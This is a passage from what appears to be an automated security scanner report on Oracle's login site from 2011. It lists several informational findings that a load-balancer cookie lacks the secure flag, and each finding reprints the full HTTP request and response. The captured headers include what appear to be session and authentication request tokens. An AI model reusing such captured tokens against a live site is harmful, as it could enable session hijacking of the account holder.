0afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:18 GMT Accept-Ranges: bytes Content-Length: 1711 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCTJ6uHK6EVADUS1EHWFB01t_dG X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ....[SNIP]...
7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/oralogo_small.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 2059 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cB X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^....[SNIP]...
7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-l.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 304 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBnj6uHK6EVADUS1EHWFB01t_c6 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.................................................................ST................XY............................TV............................PQ....................................................[SNIP]...
7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-m-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 154 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpw6uHK6EVADUS1EHWFB01t_cE X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;
7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-r.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 319 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC986uHK6EVADUS1EHWFB01t_cg X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a............................................MO.......MN.......PQ.......ST............................................................................................................................[SNIP]...
7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/sso_check.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/sso_check.js HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1Qh